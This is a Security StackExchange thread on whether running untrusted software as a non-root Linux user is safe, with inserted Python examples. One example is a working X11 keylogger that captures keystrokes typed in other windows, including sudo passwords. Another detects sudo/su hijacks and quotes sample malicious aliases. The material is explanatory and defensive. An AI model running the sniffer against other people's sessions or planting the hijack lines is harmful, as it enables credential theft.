Score: 27

We always hear it is safe to run unknown programs as non-root users in Linux because non-root users are sandboxed from the system level and can't change anything out of their permission scope. If need be, as root user one can always delete a non-root user and be confident the rest of the system wasn't affected.

However, isn't it possible for a low-level user to install a script with a keylogger, for example, that waits for an `su -` or `sudo` call and takes system control from there?

user1717828

  • Ideally, installing a keylogger wouldn't be possible as a non-root user. – JimmyJames Apr 29 '16 at 16:24
  • To be honest, on a single user system (like a personal computer) there isn't much point to getting root, as all the important data is already accessible from your user account. – André Borie Apr 29 '16 at 18:48
  • The [obligatory XKCD](https://xkcd.com/1200/) –  Apr 29 '16 at 19:46

6 Answers

Score: 59

We always hear...

Do we? I don't.

Installing some untrusted program as a normal user is a bad idea with Linux, the same as it is with Windows or Mac: this program has access to all your data and can delete these data, send these data to somebody else, etc. Moreover it can make screenshots, control other applications running on the same X Windows screen (even if they run as a different user), can grab keys (i.e. keylogger), ... For details see The Linux Security Circus: On GUI isolation.

Apart from that, we regularly have privilege escalation bugs even in Linux, bugs which can be used by an unprivileged user to get root or even kernel-level permissions.

Thus don't install any untrusted programs on any kind of system unless you are willing to compromise this system or the data stored on it.

Steffen Ullrich

  • Can confirm, as someone new to *nix systems, that I've heard that before. – Insane Apr 29 '16 at 19:07
  • On Linux, you have many users for many things and it is considered _more_ secure and especially more usual to run apps as a separate user. It's not _secure_ to run something as a separate user, but it will stop many things like the average ransomware. – Sebb Apr 30 '16 at 19:51
  • To be fair, I would expect a program to be able to do whatever my normal user can, but I didn't know that an unprivileged program could sniff the input to sudo (is that still true today on modern distros?). That strikes me as a rather unexpected flaw, particularly considering that if I switch to the admin user under Windows the same can't happen since that's crossing a security boundary. – Voo Apr 30 '16 at 20:36
  • @Voo That's not right, you are blending together too many concepts and making some assumptions. To sniff the input to sudo, all you need to do is read from the keyboard. Many apps can read keyboard input even when they don't have focus - think about a music player or a game overlay. This is usually not considered an "administrative task". The difference with Windows is that you type your admin pass into a dedicated overlay, whereas a terminal window is not given any special sandboxing, even if you happen to type `sudo` into it. The Linux command `gksudo` does the overlay thing that you like. – Mike Ounsworth May 01 '16 at 14:11
  • @Mike Yes I'm aware that many apps can read keyboard input and that Windows forces a separate security boundary to avoid that problem. I would've assumed that sudo had some way to do something similar. I mean if every untrusted program can read the sudo password anyhow, this strikes me as a perfect example of security through obscurity. I mean what's the purpose of sudo right now? Clearly not added security. – Voo May 01 '16 at 14:23
  • @Voo ... I don't think you understand what `sudo` is, it's a command-line tool. It's not aware of things like keyboard drivers or the GUI environment around it. Now, `gksudo` does all the nice things you're thinking of. If you're in gnome you should be using `gksudo` rather than `sudo`. – Mike Ounsworth May 01 '16 at 14:29
  • @Mike The point is that Linux ships with an inherently insecure tool, that's used in pretty much every guide on the internet to gain special rights (a quick google comparison for `site:http://askubuntu.com/ "sudo"` vs `gksudo` returns 223.000 vs. 8.500 entries for me). Clearly the tool should either be secure or there should be a large effort to educate users about this. The canonical answer on askubuntu doesn't mention this difference either (but instead just talks about how you should launch graphical applications with gksudo - that part I already knew). – Voo May 01 '16 at 14:42
  • [Links](http://askubuntu.com/questions/11760/what-is-the-difference-between-gksudo-nautilus-and-sudo-nautilus) [for reference](http://askubuntu.com/questions/163884/difference-between-gksudo-and-sudo). – Voo May 01 '16 at 14:42
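The X11 key sniffing that this answer and its comments describe, as an added example (not code from the answer or from the linked post): it drives `xinput` and `xmodmap`, which the thread itself points to, and assumes their output looks like the constructed samples in the block (a `list --short` line per device, `key press   <code>` lines from `xinput test`, `keycode  N = sym ...` lines from `xmodmap -pke`; that format is an assumption about your xinput version). Run it as an ordinary non-root user inside an X session, then type into a terminal in another window; the key presses come back decoded.

```python
"""Why an unprivileged X11 client can read what is typed into sudo.

Added example, not code from the answer or the linked blog post. It wraps the
`xinput`/`xmodmap` tools the thread mentions and assumes the output formats
shown in the constructed samples below. Run it as your ordinary non-root user
in an X session and type into any other window while it listens.
"""
import re
import subprocess
from typing import Dict, List, Tuple

# Constructed sample of `xinput list --short`: master devices, then slaves.
SAMPLE_LIST = (
    "⎡ Virtual core pointer                    \tid=2\t[master pointer  (3)]\n"
    "⎜   ↳ Virtual core XTEST pointer          \tid=4\t[slave  pointer  (2)]\n"
    "⎣ Virtual core keyboard                   \tid=3\t[master keyboard (2)]\n"
    "    ↳ Virtual core XTEST keyboard         \tid=5\t[slave  keyboard (3)]\n"
    "    ↳ AT Translated Set 2 keyboard        \tid=11\t[slave  keyboard (3)]\n"
)
# Constructed sample of `xmodmap -pke` (keycode -> keysyms, unshifted first).
SAMPLE_KEYMAP = (
    "keycode   8 =\n"
    "keycode  36 = Return NoSymbol Return\n"
    "keycode  38 = a A a A\n"
    "keycode  39 = s S s S\n"
    "keycode  50 = Shift_L NoSymbol Shift_L\n"
    "keycode  65 = space NoSymbol space\n"
)
# Constructed sample of `xinput test <id>` while someone typed "sa<Enter>".
SAMPLE_EVENTS = (
    "key press   39 \nkey release 39 \n"
    "key press   38 \nkey release 38 \n"
    "key press   36 \nkey release 36 \n"
)

_DEVICE_RE = re.compile(r"^\W*(?P<name>.*?)\s+id=(?P<id>\d+)\s+\[(?P<kind>[^\]]+)\]")
_KEYMAP_RE = re.compile(r"^keycode\s+(?P<code>\d+)\s*=\s*(?P<syms>.*)$")
_EVENT_RE = re.compile(r"^key (?P<action>press|release)\s+(?P<code>\d+)")


def keyboard_ids(xinput_list: str) -> List[Tuple[int, str]]:
    """(id, name) of every slave keyboard; `xinput test` attaches per slave device."""
    found = []
    for line in xinput_list.splitlines():
        m = _DEVICE_RE.match(line)
        if m and "slave" in m["kind"] and "keyboard" in m["kind"]:
            found.append((int(m["id"]), m["name"].strip()))
    return found


def keysym_map(xmodmap_pke: str) -> Dict[int, str]:
    """keycode -> unshifted keysym name ('a', 'Return', 'space', ...)."""
    table: Dict[int, str] = {}
    for line in xmodmap_pke.splitlines():
        m = _KEYMAP_RE.match(line)
        if m and m["syms"].split():
            table[int(m["code"])] = m["syms"].split()[0]
    return table


def key_events(xinput_test: str) -> List[Tuple[str, int]]:
    """('press'|'release', keycode) pairs parsed from `xinput test` output."""
    events = []
    for line in xinput_test.splitlines():
        m = _EVENT_RE.match(line)
        if m:
            events.append((m["action"], int(m["code"])))
    return events


def typed_text(xinput_test: str, keymap: Dict[int, str]) -> str:
    """Reconstruct the key presses as text: single-character keysyms as-is
    (unshifted; Shift is not applied), anything else as <Name>."""
    parts = []
    for action, code in key_events(xinput_test):
        if action != "press":
            continue
        sym = keymap.get(code)
        if sym is None:
            parts.append(f"<keycode {code}>")
        elif len(sym) == 1:
            parts.append(sym)
        else:
            parts.append(f"<{sym}>")
    return "".join(parts)


def _run(*cmd: str) -> str:
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout


def sniff(seconds: float = 10.0) -> str:
    """Live demonstration: attach to the first physical keyboard and return what
    was typed anywhere on the display during `seconds`. Needs DISPLAY set."""
    physical = [d for d in keyboard_ids(_run("xinput", "list", "--short")) if "XTEST" not in d[1]]
    if not physical:
        raise SystemExit("no slave keyboard found (is DISPLAY set?)")
    dev_id, name = physical[0]
    keymap = keysym_map(_run("xmodmap", "-pke"))
    print(f"listening on device {dev_id} ({name}) for {seconds:.0f}s; type into another window")
    try:
        # xinput test never exits on its own; the timeout kills it and we keep
        # whatever it printed (assumes xinput line-buffers its stdout).
        out = subprocess.run(["xinput", "test", str(dev_id)], capture_output=True,
                             text=True, timeout=seconds).stdout
    except subprocess.TimeoutExpired as exc:
        raw = exc.stdout or b""
        out = raw.decode(errors="replace") if isinstance(raw, bytes) else raw
    return typed_text(out, keymap)


if __name__ == "__main__":
    print("captured:", sniff())
```

This is the whole of the "keylogger" the question asks about: no root, no setuid, no exploit, just an X11 client attaching to the keyboard device, which is exactly the GUI-isolation gap the answer cites. It is also a usable check on your own setup: run it, type a `sudo` password in another terminal, and if the characters come back your session offers no boundary between that prompt and the programs you run. On a Wayland session the same `xinput` call only sees input that reaches XWayland, so keys typed into native Wayland windows do not show up; that difference is the isolation X11 lacks.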
Score: 36

In short: yes, being on a low-privilege account helps protect you against malware, but does not make you immune. Like any security measure, no single thing is going to keep you 100% safe.

TL;DR: Running on a low-privilege account (aka "principle of least privilege") should be part of a balanced breakfast which also includes good firewall configurations; tools to monitor processes, system resources, open ports, network traffic, etc for suspicious activity; a policy to only run signed executables, configuration of the SELinux secure kernel mod, keeping the OS and application up to date with security patches, and other things.


Your question is too broad to answer directly. Instead I'll break it into several cases based on the configuration of the system, and what the attacker is after:

Case #1: Personal computer

Let's say the Linux computer in question is my personal laptop. I effectively use this as a single-user system and I type sudo pretty regularly, so all of the things you mentioned apply. Moreover, if the attacker is trying to steal my personal information like credit card numbers, tax documents, etc., that's all sitting in my home directory where this user has access to it. If it's ransomware and wants to encrypt my personal files, same thing. If they want to install a background process to make my computer part of a botnet, that doesn't need any special permissions either.

Case #2: Server, admin account

The damage of getting malware onto an admin's account is less than the end-user case above since the admin account probably has no valuable data in it, but even so, an attacker can probably do some damage by having a packet sniffer inside the network, or by opening a port that allows the attacker to do pen testing from inside the network. Here you would rely on your firewall configuration to protect you against some of this and hopefully notify you of the suspicious activity so you can clean it up.

If the admin types sudo on a regular basis, then yeah, you're probably in trouble.

Case #3: Server, non-admin account

Imagine the user in question is `tomcat`, a very low-privilege user that runs the web server applications. This is the case people usually think of when talking about "principle of least privilege", and getting malware onto this account will be the least dangerous of the three cases I've mentioned.

Also consider that privilege escalation exploits exist for Linux that would allow a low-privilege user to bypass the OS security and turn themselves into root. Generally speaking, keeping up to date with security patches protects you against this, but actors wealthy enough to purchase exploits on the black market will know about zero-day exploits that are not publicly known, and have not been patched.

Mike Ounsworth

  • Note: it is perfectly possible to have a separate user account for a somewhat untrusted install on your personal computer. It won't have access to your data, it won't be able to intercept your sudo. Plus it's easy to see if it has some background job running, as it will have a specific user id. – spectras Apr 30 '16 at 19:53
  • @spectras Sure, you _could_, but _do you_? Only installing untrusted software (which, realistically, is most software) on a dedicated low-privilege account would make a personal computer almost completely unusable. – Mike Ounsworth Apr 30 '16 at 20:21
  • I think it should be made more clear. It can be a lot, very, and **incredibly** dangerous to run things even on your own unprivileged user. Imagine having a thesis deleted by ransomware a day before due date... – NothingsImpossible May 01 '16 at 04:57
  • @MikeOunsworth actually, I chose to trust my distro's repository. Anything I *really* need and is not in it I have a separate user account for and I copy documents over to a shared area. Granted, if it happened often it would be an annoyance. – spectras May 01 '16 at 10:54
  • @spectras Kudos then, that's a good security practice. – Mike Ounsworth May 01 '16 at 13:18
  • @spectras: but it can [still steal your keystrokes, including your password](https://theinvisiblethings.blogspot.com/2011/04/linux-security-circus-on-gui-isolation.html). – Dan Dascalescu Feb 16 '21 at 12:07
  • @DanDascalescu> that is, assuming it has access to my gui session. Which it doesn't. – spectras Feb 16 '21 at 12:10
Score: 9

This is a horrible case of Security Theater

Security Theater is the practice or belief of something that looks like it improves security, but in reality does little for it, or even harms it.

This false belief has been around as long as the following rumor:

Linux has no viruses because of its permission system

That's almost as good as saying:

I don't have a virus on my computer because I don't see anything flashing

Just because you don't see it, doesn't mean it's true. Closing your eyes doesn't protect you from the intruder.

In all reality Linux, Mac OS, Windows, Android, Xbox, everything has vulnerabilities that would allow escalation to a system level of control.

HOWEVER just because the attack doesn't escalate itself to system level doesn't mean it isn't EXTREMELY dangerous. These applications with just user level access can still steal your information, record your every move, and hold your data for ransom! All without EVER being escalated because this is the data it has access to as just your user.

These facts are true of ANY OS regardless of the device. If you have access to the memory, it has access to the memory. That means even if you can't see it, it still has access to it.


The Good News

Because you are a regular user it means the attack isn't already at root level privileges, which means the access it has is limited to the user's access, and helps protect other users on the system. Of course this doesn't mean that escalation can't happen, it just means it's much harder.

Robert Mennell
Score: 5

The system itself is safe from accounts that aren't root-equivalent, but that doesn't help much on a desktop where most of what you care about is your own data, and you authenticate regularly to become root from your account.

If someone has an account on a correctly-configured multi-user system, and they don't have sudo privileges or the root password, then barring any bugs in privileged software, there's nothing that user can do that will give them control of the machine. A user account that may have installed malicious software should be considered a potential attacker by the rest of the system.

On my desktop, I added an unprivileged account that I can sudo to, but it can't sudo to root. I sometimes run software I trust a bit, but not entirely, under that account, especially if it uses networking.

In theory, since I give that account access to my X server, it could escalate its privileges with clipboard / keystroke-simulation attacks. It's in the same Unix group as my regular account, and I'm sure I haven't fully removed group-write permission from some important files, but I did chmod 0644 ~/.bash{rc,_profile} and some other important files. So it's an extra hurdle that some malware might not have anticipated.

Peter Cordes
Score: 2

The recipe here, while not by any means foolproof, is incomplete or wrong.

Installing untrusted software under your unprivileged account is a disaster.

Installing it in a carefully prepared other unprivileged account? Less risky, but by no means guaranteed to be safe.

If:

  • you are sure that your system is set up as a secure multi-user system (no random bits of write access to system directories, probably full SELinux)
  • You create an account that shares no groups with your account.
  • You have carefully set the access on all your data to be something like 0770 -- no access to 'other' --

then you are as secure as any environment that depends on multi-user security on a shared Linux system. However, those bullets represent quite a lot of work. Wouldn't it be easier to boot a CD or a VM?

bmargulies
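The per-account isolation the last two answers rely on (Peter Cordes's `chmod 0644` on his dotfiles, bmargulies's "no shared groups, 0770 on your data") only holds if the permission bits actually say so. The following is an added example, not code from either answer: it audits a home directory for anything a second unprivileged account could read or tamper with, and can apply the fix. The list of start-up entries it treats as code-executing is an assumption about a typical bash/zsh desktop, and the demo home it builds is a constructed sample.

```python
"""Audit a home directory for what another unprivileged account could read
or tamper with, and optionally fix it.

Added example, not code from either answer above. Two conditions from the
answers are checked: nothing under the home directory is readable or
writable by 'other', and the entries a login shell executes or trusts (the
home directory itself, ~/.bashrc and friends, ~/.ssh) are not writable by
the group either, because a group-writable ~/.bashrc lets any account in
that group run code as you at your next login.
"""
import os
import stat
import tempfile
from pathlib import Path
from typing import Dict, Iterator, List, Tuple

# Top-level entries that run code or grant access at login. This list is an
# assumption about a typical bash/zsh desktop; extend it for your shell.
STARTUP_ENTRIES = (".bashrc", ".bash_profile", ".profile", ".zshrc",
                   ".xsession", ".xinitrc", ".ssh")


def _entries(home: Path) -> Iterator[Tuple[Path, int]]:
    """home itself plus everything below it, with permission bits. Symlinks
    are skipped: their mode bits are meaningless and the target is visited
    on its own if it lives under home."""
    for path in [home, *home.rglob("*")]:
        try:
            st = path.lstat()
        except OSError:
            continue
        if not stat.S_ISLNK(st.st_mode):
            yield path, stat.S_IMODE(st.st_mode)


def _is_startup(home: Path, path: Path) -> bool:
    top = path.relative_to(home).parts[:1]
    return path == home or (bool(top) and top[0] in STARTUP_ENTRIES)


def audit_home(home: Path) -> Dict[str, List[str]]:
    """Offending paths relative to home ('.' is the home directory itself)."""
    findings: Dict[str, List[str]] = {
        "other_readable": [], "other_writable": [], "group_writable_startup": []}
    for path, mode in _entries(home):
        rel = str(path.relative_to(home))
        if mode & stat.S_IROTH:
            findings["other_readable"].append(rel)
        if mode & stat.S_IWOTH:
            findings["other_writable"].append(rel)
        if _is_startup(home, path) and mode & stat.S_IWGRP:
            findings["group_writable_startup"].append(rel)
    return {kind: sorted(paths) for kind, paths in findings.items()}


def harden(home: Path) -> int:
    """Strip every 'other' bit below home and group-write on the start-up
    entries. Owner bits are never touched. Returns the number of entries changed."""
    changed = 0
    for path, mode in _entries(home):
        new = mode & ~stat.S_IRWXO
        if _is_startup(home, path):
            new &= ~stat.S_IWGRP
        if new != mode:
            os.chmod(path, new)
            changed += 1
    return changed


def make_demo_home() -> Path:
    """Constructed sample home directory with typical sloppy permissions."""
    home = Path(tempfile.mkdtemp(prefix="demo-home-"))
    layout = {  # relative path -> mode; directories end with '/'
        ".": 0o755, ".bashrc": 0o664,
        ".ssh/": 0o700, ".ssh/authorized_keys": 0o664,
        "Documents/": 0o750, "Documents/taxes.pdf": 0o600,
        "scratch.txt": 0o666,
    }
    for rel in layout:
        target = home / rel
        if rel == "." or rel.endswith("/"):
            target.mkdir(exist_ok=True)
        else:
            target.write_text("sample\n")
    for rel, mode in layout.items():  # chmod after creation so umask is irrelevant
        os.chmod(home / rel.rstrip("/"), mode)
    return home


if __name__ == "__main__":
    for kind, paths in audit_home(Path.home()).items():
        print(f"{kind}: {len(paths)}")
        for rel in paths[:10]:
            print("   ", rel)
```

`audit_home(Path.home())` on a stock desktop usually reports the home directory itself as `other_readable` (most distros create it 0755), which is exactly the hole bmargulies's 0770 closes; `harden` is deliberately conservative and never loosens anything, so a second run reports nothing changed.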
Score: -5

isn't it possible for a low-level user to install a script with a keylogger, for example, that waits for an su - or sudo call and takes system control from there?

No - and you've already given the answer, because that is "out of their permission scope". Linux has always been a multi-user system and (nearly) everything which can be implemented outside of the kernel is implemented outside of the kernel and therefore subject to the constraints of the permissions system.

A user can install/run code which trashes their own data, but the only way any further harm can be done is by exploiting a vulnerability in the implementation.

Yes, if that user has `su` or `sudo` access then it's possible that malware could change the path to point to its own code instead of su/sudo and thereby MITM the interaction, but this is a bit more tricky to do in practice, since su or sudo would have to be invoked from a process tree which already contains the running malware.

symcbean

  • Unfortunately the security model of X11 makes key loggers possible even for non-privileged users. – Steffen Ullrich Apr 29 '16 at 14:40
  • @Steffen: are you still using MIT magic cookies? (OK this is also possible with XDM auth) – symcbean Apr 29 '16 at 14:45
  • @SteffenUllrich How would a keylogger be able to be installed as a regular user unless the "root/sudo" account was already compromised? Looking at all X11 permissions (on my box), any modifications would have to be as root... Just trying to better understand how a keylogger as a non-root user is even possible – IT_User Apr 29 '16 at 14:48
  • See [The Linux Security Circus: On GUI isolation](http://theinvisiblethings.blogspot.de/2011/04/linux-security-circus-on-gui-isolation.html) for details or simply play around as a non-privileged user with `xinput` or `xev`. You will see that it is easy to sniff any keys in X11. – Steffen Ullrich Apr 29 '16 at 14:55
  • @SteffenUllrich Thank you very much. Just started on the security aspects of systems and quite a bit of a learning curve (although fascinating). – IT_User Apr 29 '16 at 15:03
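The PATH interposition this answer describes, as an added check (my code, not the answer's): it lists the PATH entries searched before the real `sudo` that the current user can write to, verifies that whatever `sudo` resolves to is actually root-owned and setuid (a wrapper dropped by an unprivileged user cannot be), and, generalising the same trick, flags `sudo`/`su` redefined as a shell alias or function in a start-up file, which the shell resolves before it consults PATH at all. The sample `.bashrc` is constructed; the start-up file list and the `/usr/bin` location of the genuine binary are assumptions.

```python
"""Detect malware-as-your-user sitting between you and sudo/su.

Added example, not code from the answer. PATH shadowing is the answer's own
point; the alias/function check is a generalisation of it (same process
tree, same effect). The start-up file list and `/usr/bin` are assumptions
about a typical distro; adjust them for yours.
"""
import os
import re
import shutil
import stat
from pathlib import Path
from typing import Callable, Dict, List

# Constructed sample ~/.bashrc: three harmless lines, then three hijacks.
SAMPLE_RC = """\
# normal stuff
export PATH="$HOME/bin:$PATH"
alias ll='ls -l'
alias sudo='$HOME/.cache/.s/sudo'
sudo() { "$HOME/.cache/.s/sudo" "$@"; }
function su { /tmp/.x/su "$@"; }
"""

_OVERRIDE_RE = re.compile(
    r"^\s*(?:alias\s+(?:sudo|su)\s*=|function\s+(?:sudo|su)\b|(?:sudo|su)\s*\(\s*\))")


def rc_overrides(rc_text: str) -> List[str]:
    """Lines that redefine sudo or su as an alias or shell function. The shell
    resolves those before it looks at PATH, so they win even if PATH is clean."""
    return [line.rstrip() for line in rc_text.splitlines() if _OVERRIDE_RE.match(line)]


def shadowing_dirs(path_value: str, real_dir: str,
                   writable: Callable[[str], bool] = lambda d: os.access(d, os.W_OK)
                   ) -> List[str]:
    """PATH entries searched before `real_dir` that the current user can write
    to; a file named sudo in any of them is what the shell will run.
    `writable` is injectable so the logic can be exercised on a made-up PATH."""
    hits = []
    for entry in path_value.split(os.pathsep):
        entry = entry or "."  # an empty PATH element means the current directory
        if os.path.normpath(entry) == os.path.normpath(real_dir):
            break
        if writable(entry):
            hits.append(entry)
    return hits


def looks_like_real_sudo(binary: Path) -> bool:
    """The genuine sudo is root-owned with the setuid bit; a wrapper written
    by an unprivileged user cannot be, so `which sudo` should resolve to one."""
    try:
        st = binary.stat()
    except OSError:
        return False
    return st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)


def check_live(real_dir: str = "/usr/bin") -> Dict[str, object]:
    """Run all checks against the current account and return the findings."""
    home = Path.home()
    rc_files = [".bashrc", ".bash_profile", ".profile", ".bash_aliases", ".zshrc"]
    overrides: Dict[str, List[str]] = {}
    for name in rc_files:
        rc = home / name
        if rc.is_file():
            found = rc_overrides(rc.read_text(errors="replace"))
            if found:
                overrides[name] = found
    resolved = shutil.which("sudo")
    return {
        "shadowing_dirs": shadowing_dirs(os.environ.get("PATH", ""), real_dir),
        "rc_overrides": overrides,
        "resolved_sudo": resolved,
        "resolved_is_setuid_root": bool(resolved) and looks_like_real_sudo(Path(resolved)),
    }


if __name__ == "__main__":
    for key, value in check_live().items():
        print(f"{key}: {value}")
```

From an interactive shell the equivalent of the alias/function check is `type -a sudo`, which lists aliases and functions ahead of the files on PATH. Note the answer's caveat still applies in reverse: these checks run in the same process tree as any malware that is already your user, so a clean result from a shell you do not trust proves little; run them from a fresh login, or from the separate account the earlier answers recommend.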